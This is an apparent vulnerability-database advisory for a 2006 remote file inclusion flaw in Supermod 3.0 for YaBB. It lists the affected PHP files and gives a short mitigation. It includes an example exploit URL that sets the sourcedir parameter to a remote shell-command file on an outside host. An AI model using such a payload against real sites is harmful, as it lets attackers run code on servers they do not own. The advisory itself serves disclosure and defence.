vendor:
Supermod 3.0 for yabb
by:
sZ
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Supermod 3.0 for yabb
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: YES
Related CWE: N/A
CPE: a:supermod:supermod:3.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Remote file include vuln found by sZ
A Remote File Inclusion (RFI) vulnerability was found in Supermod 3.0 for yabb. The vulnerable files are Offline.php, Sources/Admin.php, Sources/Offline.php and content/portalshow.php. The vulnerable code in each file is an include statement that does not include the settings.php file. An example exploit URL is http://site.com/community/Offline.php?sourcedir=http://shellurl.com/phpcommands.txt?
Mitigation:
Ensure that all include statements are properly sanitized and that the settings.php file is included in all include statements.